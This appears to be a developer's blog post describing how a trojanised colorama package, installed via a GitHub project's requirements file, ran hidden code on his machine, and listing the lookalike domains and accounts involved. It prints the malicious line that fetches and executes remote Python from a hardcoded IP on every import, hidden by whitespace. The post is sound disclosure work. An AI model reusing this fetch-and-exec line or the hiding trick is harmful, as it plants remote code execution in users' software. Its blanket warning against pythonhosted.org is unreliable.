Discovering malwares in public GitHub repositories

Mohammed Dief
5 min readMar 4, 2024

I trust this article finds you in good spirits. Let’s forgo the formalities of introductions and dive straight into the subject at hand.

I was using my laptop today, just the regular messing around with python and other stuff on my command line, until I seen a weird message on my command line saying that there’s something wrong with colorama on python, I didn’t care much cause I’m used to this stuff so I just skipped it, Few minutes later I got the same error message but in a different script I’m using, The error message was like this

Traceback (most recent call last):
File "<string>", line 1, in <module>
File "C:\Users\demonia\AppData\Local\Programs\Python\Python312\Lib\site-packages\colorama\__init__.py", line 6, in <module>
__version__ = '0.4.3' ;exec(__import__('requests').get('http://144.172.67.49/version').text)


^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "<string>", line 1
<html>
^
SyntaxError: invalid syntax

The moment I seen this I knew what’s going on, I got hacked, But how did it happen? I had no idea, So I started my analysis

I started by opening C:\Users\demonia\AppData\Local\Programs\Python\Python312\Lib\site-packages\colorama\__init__.py @ Visual studio code, and I seen nothing! It literally looked like this

__init__.py on visual studio code

Until I noticed the scroll-bar on the code editor below, I kept scrolling and found a code being pushed by spaces to the end of the page so it won’t be noticed, it was just like this

The malicious code getting executed on colorama

So let’s break down the malicious code, The hacker is using the __import__ function on python to import requests library, then send a GET request to http://144.172.67.49/version, then take the text attribute from the requests object, while all of that is wrapped around an exec function, The attacker is able to execute dynamic remote python code on the victim machine every single time colorama is being imported, Like just being imported you don’t have to use colorama in your code for the exploit to work, because the malware exists in __init__.py it’s going to get executed no matter if you use it, or not.

I decided to dig deep into the server where the malware is hosted, It turned out that the IP address do belong to GalaxyGate, but it turned out that GalaxyGate is just a VPS provider, nothing crazy about it, they give people servers and they host whatever content they want on it, But we definitely know for sure it’s one of GalaxyGate users hosting this malware

The IP address whois lookup

After all of this, I didn’t really figure out where I did get infected by this malware, So I checked every single repository and project I installed or used pip inside of it, And I noticed something weird, I recently downloaded https://github.com/maleduque/Valorant-Checker and checking the requiremnts.txt file I found this

The malware requiremnts.txt file

And I knew for sure that’s the reason I got the malware the moment I seen the version, The colorama version matches the ones I got with the malware in it, I tried to visit the package that had the malware, but it seems like it got deleted, I have no idea if pypihosted or pythonhosted is owned by the guy spreading the malware, But it seems like it’s not cause the malware got deleted, Maybe someone noticed it? I have no idea

After I did all of that, there’s only one thing left to do now, Find the other places where this malware is hosted and expose the accounts spreading this malware, So I did a simple GitHub query searching for pypihosted.org and I ended up with 9 results

Places where the malware is hosted

So here’s a list of the repos that contained the malware inside of it before, If you downloaded any of those repos or any other repos from those users maintaining the repos with the malware inside of it, please make sure to check your system

Well, the point of this article is always check the repo before downloading anything, and never trust content hosted on pypihosted.org or pythonhosted.org, either it’s hosted on pypi or it’s a malware, shoutout for my boy flexeando for hosting the malware though, it’s really smart of him to follow himself and 2 accounts mentioning him in their bio in the account he’s using to spread the malware

I hope you enjoyed this article anyways, have a great day and stay safe!

--

--